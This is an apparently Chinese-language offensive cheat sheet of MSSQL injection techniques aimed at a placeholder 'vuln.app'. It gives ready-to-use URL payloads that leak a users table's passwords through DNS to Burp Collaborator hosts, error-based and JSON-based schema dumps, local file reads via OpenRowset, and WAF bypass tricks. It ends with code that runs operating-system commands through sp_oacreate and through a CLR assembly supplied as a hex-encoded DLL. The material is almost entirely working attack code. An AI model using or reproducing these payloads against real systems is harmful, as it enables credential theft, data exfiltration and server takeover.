知識補完計画

MSSQL注入技巧

DNS 带外

在进行盲注且不能堆叠查询的情况下,可以利用以下几个方法进行 DNS OOB

  1. fn_xe_file_target_read_file()

    https://vuln.app/getItem?id= 1+and+exists(select+*+from+fn_xe_file_target_read_file('C:\*.xel','\\'%2b(select+pass+from+users+where+id=1)%2b'.064edw6l0h153w39ricodvyzuq0ood.burpcollaborator.net\1.xem',null,null))

    要求权限:VIEW SERVER STATE

  2. fn_get_audit_file()

    https://vuln.app/getItem?id= 1%2b(select+1+where+exists(select+*+from+fn_get_audit_file('\\'%2b(select+pass+from+users+where+id=1)%2b'.x53bct5ize022t26qfblcsxwtnzhn6.burpcollaborator.net\',default,default)))

    要求权限:CONTROL SERVER

  3. fn_trace_gettable()

    https://vuln.app/ getItem?id=1+and+exists(select+*+from+fn_trace_gettable('\\'%2b(select+pass+from+users+where+id=1)%2b'.ng71njg8a4bsdjdw15mbni8m4da6yv.burpcollaborator.net\1.trc',default))

    要求权限:CONTROL SERVER

基于错误查询

一般会使用 +AND+1=@@version–OR 来触发异常,很可能被 waf 拦截。可以通过 %2b 配合下列函数来代替:

SUSER_NAME()
USER_NAME()
PERMISSIONS()
DB_NAME()
FILE_NAME()
TYPE_NAME()
COL_NAME()

举个例子

https://vuln.app/getItem?id=1'%2buser_name(@@version)--

一句话

  1. 查询 schema & tables & columns

       https://vuln.app/getItem?id=-1'+union+select+null,concat_ws(0x3a,table_schema,table_name,column_name),null+from+information_schema.columns+for+json+auto--

  2. 利用 JSON 格式化错误

       https://vuln.app/getItem?id=1'+and+1=(select+concat_ws(0x3a,table_schema,table_name,column_name)a+from+information_schema.columns+for+json+auto)--

读取文件

利用 OpenRowset 函数读取本地文件,需要 ADMINISTER BULK OPERATIONS 或者 ADMINISTER DATABASE BULK OPERATIONS 权限

https://vuln.app/getItem?id=-1+union+select+null,(select+x+from+OpenRowset(BULK+’C:\Windows\win.ini’,SINGLE_CLOB)+R(x)),null,null

基于错误查询:

https://vuln.app/getItem?id=1+and+1=(select+x+from+OpenRowset(BULK+'C:\Windows\win.ini',SINGLE_CLOB)+R(x))--

waf bypass

  1. %C2%85%C2%A0 可以代替空格

  2. 混淆 UNION 关键字

       https://vuln.app/getItem?id=0eunion+select+null,@@version,null--
   https://vuln.app/getItem?id=0xunion+select+null,@@version,null--

  3. FROM 和列名中间用句号代替空格

       https://vuln.app/getItem?id=1+union+select+null,@@version,null+from.users--

  4. SELECT 和列名之间用 \N 代替空格

       https://vuln.app/getItem?id=0xunion+select\Nnull,@@version,null+from+users--

不使用 xp_cmdshell 执行系统命令

COM

sp_oacreate 是一个非常危险的存储过程,可以删除、复制、移动文件,还能配合 sp_oamethod 来写文件执行 cmd。sp_oacreate 和 sp_oamethod 两个过程分别用来创建和执行脚本语言,换言之就是 xp_cmdshell 能执行的 sp_oacreate+sp_oamethod 同样能胜任。

wscript.shell 存在一个 exec 方法可以执行系统命令并获得回显:

declare @luan int,@exec int,@text int,@str varchar(8000);
exec sp_oacreate '{72C24DD5-D70A-438B-8A42-98424B88AFB8}',@luan output;
 
--exec sp_oamethod @luan,'run',null,'calc.exe';
 
exec sp_oamethod @luan,'exec',@exec output,'C:\\Inetpub\\wwwroot\\lu4n.com\\cmd.exe /c whoami';
exec sp_oamethod @exec, 'StdOut', @text out;
exec sp_oamethod @text, 'readall', @str out
select @str;

CLR

可以看做成 mysql 的 UDF,不过可以直接使用 16 进制代码来创建自定义函数,不需要写文件。

--DROP ASSEMBLY luan_exec;
--DROP FUNCTION dbo.shell;
 
--alter database [master] set trustworthy on;
--CREATE ASSEMBLY luan_exec FROM 0x4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000800000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000504500004c01030029d16a5a0000000000000000e00022200b013000000a00000006000000000000be2800000020000000400000000000100020000000020000040000000000000004000000000000000080000000020000000000000300408500001000001000000000100000100000000000001000000000000000000000006c2800004f000000004000007c03000000000000000000000000000000000000006000000c000000342700001c0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000200000080000000000000000000000082000004800000000000000000000002e74657874000000c408000000200000000a000000020000000000000000000000000000200000602e727372630000007c0300000040000000040000000c0000000000000000000000000000400000402e72656c6f6300000c0000000060000000020000001000000000000000000000000000004000004200000000000000000000000000000000a0280000000000004800000002000500c4200000700600000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000133003005f00000000000000730e00000a256f0f00000a026f1000000a256f0f00000a176f1100000a256f0f00000a166f1200000a256f0f00000a176f1300000a256f0f00000a176f1400000a256f0f00000a036f1500000a256f1600000a266f1700000a6f1800000a2a1e02281900000a2a0042534a4201000100000000000c00000076322e302e35303732370000000005006c00000020020000237e00008c020000ec02000023537472696e6773000000007805000004000000235553007c0500001000000023475549440000008c050000e400000023426c6f620000000000000002000001471500000900000000fa0133001600000100000013000000020000000200000002000000190000000d00000001000000020000000000a0010100000000000600f90054020600660154020600460022020f007402000006006e00b5010600dc00b5010600bd00b50106004d01b50106001901b50106003201b50106008500b50106005a0035020600380035020600a000b50106009902a9010a00830222020a00d90122020600ea010a000600f7010a000000000001000000000001000100010010001d00b0013d00010001005020000000009600c70135000100bb200000000086181c0206000300000001009801000002009c0109001c02010011001c02060019001c020a0029001c02100031001c02100039001c02100041001c02100049001c02100051001c02100059001c02100061001c02150069001c02100071001c02100081001c0206008100cb011a0089002b0010008900d90215008900840115008900be02150089000202150089008b0210008100a0021f008100ab02230099002100280079001c0206002e000b003b002e00130044002e001b0063002e0023006c002e002b0076002e00330076002e003b007c002e0043006c002e004b008b002e00530076002e005b0076002e006300ac002e006b00d600048000000100000000000000000000000000a60200000200000000000000000000002c001400000000000200000000000000000000002c00a901000000000000003c4d6f64756c653e0053797374656d2e494f006d73636f726c696200636d640052656164546f456e64007365745f46696c654e616d6500477569644174747269627574650044656275676761626c6541747472696275746500436f6d56697369626c6541747472696275746500417373656d626c795469746c6541747472696275746500417373656d626c7954726164656d61726b41747472696275746500417373656d626c7946696c6556657273696f6e41747472696275746500417373656d626c79436f6e66696775726174696f6e41747472696275746500417373656d626c794465736372697074696f6e41747472696275746500436f6d70696c6174696f6e52656c61786174696f6e7341747472696275746500417373656d626c7950726f6475637441747472696275746500417373656d626c79436f7079726967687441747472696275746500417373656d626c79436f6d70616e794174747269627574650052756e74696d65436f6d7061746962696c697479417474726962757465007365745f5573655368656c6c45786563757465006578650061726700746573742e646c6c0053797374656d006c75616e0053797374656d2e5265666c656374696f6e0072756e006765745f5374617274496e666f0050726f636573735374617274496e666f0053747265616d5265616465720054657874526561646572007365745f52656469726563745374616e646172644572726f72002e63746f720053797374656d2e446961676e6f73746963730053797374656d2e52756e74696d652e496e7465726f7053657276696365730053797374656d2e52756e74696d652e436f6d70696c6572536572766963657300446562756767696e674d6f6465730050726f63657373007365745f417267756d656e7473004f626a6563740053746172740074657374006765745f5374616e646172644f7574707574007365745f52656469726563745374616e646172644f7574707574007365745f4372656174654e6f57696e646f770000000000e388bea52dd89b46bc54e92695a9106b00042001010803200001052001011111042001010e042001010204200012450320000204200012490320000e08b77a5c561934e0890500020e0e0e0801000800000000001e01000100540216577261704e6f6e457863657074696f6e5468726f777301080100020000000000090100047465737400000501000000000e0100094d6963726f736f667400002001001b436f7079726967687420c2a9204d6963726f736f6674203230313800002901002434363864653931652d356661622d346431632d613639392d31323937343038343437663700000c010007312e302e302e300000000000000029d16a5a00000000020000001c010000502700005009000052534453c5a291c391233540a57b8322a05f0d8601000000443a5c615c7270635c746573745c746573745c6f626a5c52656c656173655c746573742e7064620000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000942800000000000000000000ae280000002000000000000000000000000000000000000000000000a0280000000000000000000000005f436f72446c6c4d61696e006d73636f7265652e646c6c0000000000ff25002000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100100000001800008000000000000000000000000000000100010000003000008000000000000000000000000000000100000000004800000058400000200300000000000000000000200334000000560053005f00560045005200530049004f004e005f0049004e0046004f0000000000bd04effe00000100000001000000000000000100000000003f000000000000000400000002000000000000000000000000000000440000000100560061007200460069006c00650049006e0066006f00000000002400040000005400720061006e0073006c006100740069006f006e00000000000000b00480020000010053007400720069006e006700460069006c00650049006e0066006f0000005c02000001003000300030003000300034006200300000001a000100010043006f006d006d0065006e007400730000000000000034000a00010043006f006d00700061006e0079004e0061006d006500000000004d006900630072006f0073006f00660074000000320005000100460069006c0065004400650073006300720069007000740069006f006e0000000000740065007300740000000000300008000100460069006c006500560065007200730069006f006e000000000031002e0030002e0030002e003000000032000900010049006e007400650072006e0061006c004e0061006d006500000074006500730074002e0064006c006c00000000005a001b0001004c006500670061006c0043006f007000790072006900670068007400000043006f0070007900720069006700680074002000a90020004d006900630072006f0073006f006600740020003200300031003800000000002a00010001004c006500670061006c00540072006100640065006d00610072006b00730000000000000000003a00090001004f0072006900670069006e0061006c00460069006c0065006e0061006d006500000074006500730074002e0064006c006c00000000002a0005000100500072006f0064007500630074004e0061006d00650000000000740065007300740000000000340008000100500072006f006400750063007400560065007200730069006f006e00000031002e0030002e0030002e003000000038000800010041007300730065006d0062006c0079002000560065007200730069006f006e00000031002e0030002e0030002e003000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000c000000c03800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
--WITH PERMISSION_SET = UNSAFE;
--CREATE FUNCTION dbo.shell(@exe as nvarchar(200),@arg as nvarchar(200))RETURNS nvarchar(200) AS EXTERNAL NAME luan_exec.[luan.cmd].run;
SELECT dbo.shell('C:\\Inetpub\\wwwroot\\lu4n.com\\cmd.exe','/c whoami')

关系图谱